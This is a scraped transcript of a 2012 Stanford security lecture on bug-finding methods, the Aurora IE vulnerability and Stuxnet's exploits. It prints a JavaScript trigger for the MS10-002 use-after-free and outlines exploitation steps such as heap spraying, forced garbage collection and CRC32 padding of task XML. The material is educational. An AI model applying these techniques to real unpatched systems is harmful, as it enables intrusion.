Bug finding in the real world
1 / 47

Bug Finding In The Real World - PowerPoint PPT Presentation

  • Uploaded on
  • Presentation posted in: General

Bug Finding In The Real World. Alex Stamos Aaron Grattafiori Stanford CS155 April 17, 2012. Your Humble Narrators. Alex Stamos Co-Founder and CTO LBNL, Loudcloud , @stake UC Berkeley BS EECS Aaron Grattafiori Senior Security Consultant Security Innovation, MyBasement

I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.

Download Presentation

Bug Finding In The Real World

An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.

- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -

Presentation Transcript

Bug Finding In The Real World

Alex Stamos

Aaron Grattafiori

Stanford CS155

April 17, 2012

Your Humble Narrators

  • Alex Stamos

    • Co-Founder and CTO

    • LBNL, Loudcloud, @stake

    • UC Berkeley BS EECS

  • Aaron Grattafiori

    • Senior Security Consultant

    • Security Innovation, MyBasement

    • UC HardKnox BS


  • Why are you finding bugs?

  • Overview of common techniques

    • Fuzzing

    • Debugging and Process Stalking

    • Reverse Engineering

  • Real World Examples

  • Ethics and Advice

  • Discussion

Why are you finding bugs?

Stolen Source Review




Static Analysis

Source Review

Bertha the Black Hat of Ill Repute

  • Goal

    • Dependable Exploitation

    • Stealth

  • Thoroughness

    • Usually only need one bug

    • No need to document coverage

  • Access

    • Often no source

Marvin the Megalomaniacal Researcher

  • Goal

    • Column inches from press, props from friends

    • Preferably in a trendy platform

    • Make money from ZDI/Pwn2Own

  • Thoroughness

    • Don’t need to be perfect, don’t want to be embarrassed

  • Access

    • Casual access to engineers

    • Source == Lawyers

Sally the Stressed Security Engineer

  • Goal

    • Find as many flaws as possible

    • Reduce incidence of exploitation*

  • Thoroughness

    • Must have coverage metrics

    • Should at least find low-hanging fruit

  • Access

    • Source code, debug symbols, engineers

    • Money for tools and staff

The Difficulty of Defense

So, oft in theologic wars The disputants, I ween,Rail on in utter ignorance Of what each other mean,And prate about an ElephantNot one of them has seen!

The Difficulty of Defense

  • Asymmetric Warfare

    • Defenders always have to be perfect

    • Attackers can be good and lucky

  • Knowing this, is bug finding an efficient defense strategy?

Limitations of Today’s Lecture

  • The most important flaws we find are NOT implementation flaws

  • Common problems:

    • Trusting untrusted components

    • Poor use of cryptography

    • Overreliance on DRM

    • Forgotten or cut security features

Black Box Bug Finding

  • Basic goal is to exercise all states of software while watching for a response that indicates vulnerability


“Smarter Fuzzing”

  • Record or implement path through gating functions

  • Utilize knowledge of protocol or file format

  • Use process hooking


Reverse Engineering

  • Decompilation

    • Often used for semi-compiled code

      • .Net CLR

      • Java

      • Flash

    • Can work with C++ w/ symbols

  • Disassembly

    • 1:1 matching with machine code

    • Modern disassemblers allow for highly automated analysis process

  • Protocol Reverse Engineering

Disassembly - IDA Pro

Reversing Patches - BinDiff

Defeating Black Box Bug Analysis

  • Many programs include anti-debug functionality

    • Check PDB

    • System calls, monitor process space

    • Throw INTs, test for catch

    • Timing tests

  • Anti-Reversing

    • Dynamic Unpacking

    • Pointer Arithmetic

    • Encrypted and obfuscated function calls

Anti-Anti-Debug - Snitch

Snitch Output on WMP

Potential break-point debugger check at 0x4bf9f889 (blackbox.dll)

Exception handler 1 is at 0x4bf9fe71 (blackbox.dll)

Exception handler 2 is at 0x7c839ac0 (kernel32.dll)

Potential break-point debugger check at 0x4bf9f9fc (blackbox.dll)

Exception handler 1 is at 0x4bf9fe71 (blackbox.dll)

Exception handler 2 is at 0x7c839ac0 (kernel32.dll)

Potential break-point debugger check at 0x4bf9f889 (blackbox.dll)

Exception handler 1 is at 0x4bf9fe71 (blackbox.dll)

Exception handler 2 is at 0x7c839ac0 (kernel32.dll)

Potential break-point debugger check at 0x4bf9f889 (blackbox.dll)

Exception handler 1 is at 0x4bf9fe71 (blackbox.dll)

Exception handler 2 is at 0x7c839ac0 (kernel32.dll)

Potential break-point debugger check at 0x4bf9f889 (blackbox.dll)

Exception handler 1 is at 0x4bf9fe71 (blackbox.dll)

Exception handler 2 is at 0x7c839ac0 (kernel32.dll)

Potential OutputDebugString debugger check at 0x7c812aeb

Module: \Device\HarddiskVolume1\WINDOWS\system32\kernel32.dll

Potential break-point debugger check at 0x4df75f36 (drmv2clt.dll)

Exception handler 1 is at 0x4dfda68e (drmv2clt.dll)

Exception handler 2 is at 0x7c839ac0 (kernel32.dll)

White Box Bug Finding

  • Black Box techniques always work better with more context

    • More quickly triage flaws

    • Patch flaws much faster

  • Analysis can start with source code

    • Look at sensitive areas

    • Use lexical analysis to give pointers

      • Flawfinder

      • RATS

    • Use semantic analysis

      • Coverity

      • Fortify

  • Most White Box techniques also increase false positive count

Hard to Find Bugs

  • MS10-002 – Remote Code Execution in IE 5-8

    function window :: onload ()


    varSourceElement = document.createElement ("div");

    document.body.appendChild (SourceElement);

    varSavedEvent = null;

    SourceElement.onclick = function () {

    SavedEvent = document.createEventObject (event);

    document.body.removeChild (event.srcElement);


    SourceElement.fireEvent ("onclick");

    SourceElement = SavedEvent.srcElement;


Hard to Find Bugs

  • How does this become a reliable exploit?

    • Heap spraying allows for predictable control of memory space

    • IE Small Block Manager Reuses Pages

    • Asynchronous Garbage Collection can be synchronized by attacker: CollectGarbage()

  • How about on more modern OSes?

    • ASLR and DEP defeated with Flash JIT

    • Return Oriented Programming


  • Good analyses of Aurora Exploit:



Future of Bug Finding

  • How could you find this bug?

    • Requires understanding of IE code

    • Difficult to triage

  • Low-Hanging Fruit is Gone

    • This bug has existed since IE5

  • Initial flaw can be found by smart fuzzing. How would you do that?

  • Exploitation should require 2-3 flaws for reliability

Jailbreaking; honorable exploitation

  • A tale of incentives

  • Apple continues to take steps to prevent jailbreaks.

  • Android takes a somewhat different approach, still is jailbroken

  • Jailbreaking of: TVs? Cars? Houses? Robots?

    (ps. comex now works at Apple)

Bugs and Exploits in the Wild

Crypto doesn’t fail, the implementations do…*

  • Browsers don’t know a site is SSL unless it forces them to use it.

  • Middle man attacks are possible… but… my site is over SSL you say!

    • SSL typically works via 302 HTTP redirect

  • UI’s are hard to get right…

    • Browsers only indicate insecurity only when security is used in the first place

  • Moxie Marlinspike pointed out the gorilla in the room. Enter SSL Stripping:

    • https://github.com/moxie0/sslstrip

    • http://www.blackhat.com/presentations/bh-dc-09/Marlinspike/BlackHat-DC-09-Marlinspike-Defeating-SSL.pdf

* http://rdist.root.org/2010/11/19/dsa-requirements-for-random-k-value/

* https://en.wikinews.org/wiki/Predictable_random_number_generator_discovered_in_the_Debian_version_of_OpenSSL


  • Tricky problem to solve…

  • HTTP Strict Transport Security (HSTS) is gaining traction

  • Google’s SPDY requires the use of SSL

  • Security at lower OSI layers?

Bugs and Exploits in the Wild

  • Hactivism

    • Anonymous vs <insert flavor of week>

    • “Hacktivist groups were responsible for 58% of all data stolen last year” – Verizon 2012 Data Breach report

    • Victims of opportunity

  • Outcomes

    • Exposure of client info, customer info, usernames, passwords, sensitive information

    • Damage focusing on the reputation and data exposure

Bugs and Exploits in the Wild

  • Stuxnet

    • [ worm [ rootkit [ rootkit [ sabotage ] ] ] ]

    • Four zero-day vulnerabilities

    • Two stolen certificates

    • Eight propagation methods

    • Partridge in a malware pear tree

Did you say… Four OH-days?

Mixed MS Windows environment = Redundant

Not exploiting memory corruption = Reliable



Lets overview…


Vulnerability Fruit Punch

  • Zero-Day* Vulnerabilities:

    • MS08-067 (NetPathCanonicalize()), (Patched)

      • http://www.phreedom.org/blog/2008/decompiling-ms08-067/

    • MS10-046 (Shell LNK / Shortcut)

    • MS10-061 (Print Spooler Service)

    • MS10-073 (Win32K Keyboard Layout)

    • MS08-092 (Task Scheduler)

    • CVE-2010-2772 (Siemens SIMATIC Static Password)

MS 10-061 aka CVE-2010-2729

  • Kaspersky mentioned to Microsoft they saw printer enumeration during network propagation

  • Using the guest account, Stuxnet “prints” to a file into: \Windows\System32

  • This only allows file writing… not remote execution

  • Enter MOF (Managed Object Format)


  • Confusing chain of microsoft buzzwords

  • Windows\System32\wbem\mof\

  • Metasploit module available (ms10_061_spoolss.rb)

MS 10-092 aka CVE-2010-3338

  • Windows >= Vista scheduled tasks in an XML format

    • Pre Vista used ???

  • Users can write and edit their tasks, CRC32 is used

  • …….. CRC32 ….

MS 10-092 continued…

  • Created task as normal user, record CRC32 value

  • Modified user definition in the task to LocalSystem

  • Take CRC32 of the task XML, pad until the CRC32 matches original

  • ?????

  • Profit


  • Memory Corruption exploitation is difficult

  • Design exploitation is 99% reliable

  • Complex Systems will always have vulnerabilities

  • Was stuxnet a…. Cyb3R W34PoN?

  • Good Watching:

    • Bruce Dang, Microsoft “Adventures in Analyzing Stuxnet” @ 27C3

      • https://www.youtube.com/watch?v=fVNHX1Hrr6w (NSFW Language)

  • Good reading:

    • http://www.symantec.com/connect/blogs/w32stuxnet-dossier

    • http://www.eset.com/resources/white-papers/Stuxnet_Under_the_Microscope.pdf


  • Big ethical debates used to be:

    Responsible vs Full Disclosure

  • Debate has shifted to:

    Disclosure vs Selling Weapons

Some Advice

  • Shape your job around your ethical standpoint, not vice versa

  • Take a startup job while this is your primary expense:

  • Find a stretch position… and stretch

More Reading


Shellcoder’s Handbook





Thank you for coming!alex@isecpartners.com


  • Login